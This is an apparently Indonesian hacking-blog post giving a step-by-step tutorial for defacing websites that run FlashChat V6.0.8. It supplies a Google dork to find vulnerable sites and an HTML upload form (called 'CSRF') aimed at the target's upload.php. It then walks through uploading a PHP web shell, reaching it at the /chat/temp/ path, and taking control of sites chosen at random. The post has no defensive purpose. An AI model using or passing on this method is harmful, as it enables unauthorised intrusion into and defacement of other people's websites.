Tutorial Deface Metode FlashChat V6.0.8 - ./Mr.Proxy

Latest

Let's Make Your Security System ^_^

Sunday, December 25, 2016

Tutorial Deface Metode FlashChat V6.0.8

Hallo guys kali ini ane bakal share Tutorial deface Metode FlashChat V6.0.8
Gak usah banyak cingcong dah langsung aja ke tutorialnya :D

Bahan :
  1. Dork : intitle:FlashChat V6.0.8 
  2. CSRF :
    <form action="http://site.co.li/chat/upload.php" method="post" enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="Submit">
    </form>
Penggunaan :
  1. Masukan Dork di atas ke mesin pencarian atau Google dan cari target yang masih perawan
  2. Ubah flashchat.php menjadi upload.php
    Contoh : http://site.co.li/chat/flashchat.php Menjadi http://site.co.li/chat/upload.php .
  3. Jika sitenya Vuln akan muncul tulisan OK dan sebaliknya jika tidak vuln akan menemukan 404 :V
  4. Lalu Kalian Masukan dah Sitenya di CSRF dan save
  5. Buka File CSRFnya lalu kalian Upload Shell atau File lainnya terserah kau saja :D
  6. Lalu klik upload. Jika Upload Sukses akan ada tulisan OK lagi 
  7. lalu kalian masuk ke shellnya
    Shell Acces : http://site.co.li/chat/temp/namashell.php
  8. Sukses :D
NOTE : CSRF di simpan dengan format .html
           : Format Shell .php

Thanks For Namaku Raden 
Thanks For SuzukaAkatsuki

Mungkin sampe disini aja tutorialnya :D Semoga bermanfaat buat kalian :D

See You Next Time

No comments:

Post a Comment